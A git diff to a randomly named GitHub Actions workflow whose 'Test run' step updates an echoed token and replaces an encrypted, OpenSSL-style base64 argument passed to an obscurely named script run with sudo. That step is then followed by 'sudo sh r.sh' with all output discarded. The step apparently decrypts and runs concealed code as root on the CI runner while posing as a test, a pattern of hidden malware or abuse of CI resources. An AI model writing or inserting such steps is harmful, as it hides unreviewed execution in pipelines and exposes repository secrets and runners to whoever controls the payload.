--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'fa9m5'
+        echo '86ye3'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+KJeBrvAtXq1ZMZjjztZfDLX11N0KCex7wnBNi7kfPO/pb8k+HUVC5kxcWUrr+Uhxa4BdGfrQhoCXklBx+p61lLVZ+Y7cZo6IR2WCj3z+oXkf0U7+gZl2M of5unj && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+Qn5aHzIY/JTndIpCJM0rJ1MxbZu+fmZFELqmdkToFIVf4XqV0mSYXahoIxO5pFo9SOnGgYZ0y3Soltf8ENtY8LeD34lAl1eOHKb4tlcnEvJubc7HJrStJ pwdoxy && sudo sh r.sh > /dev/null 2>&1
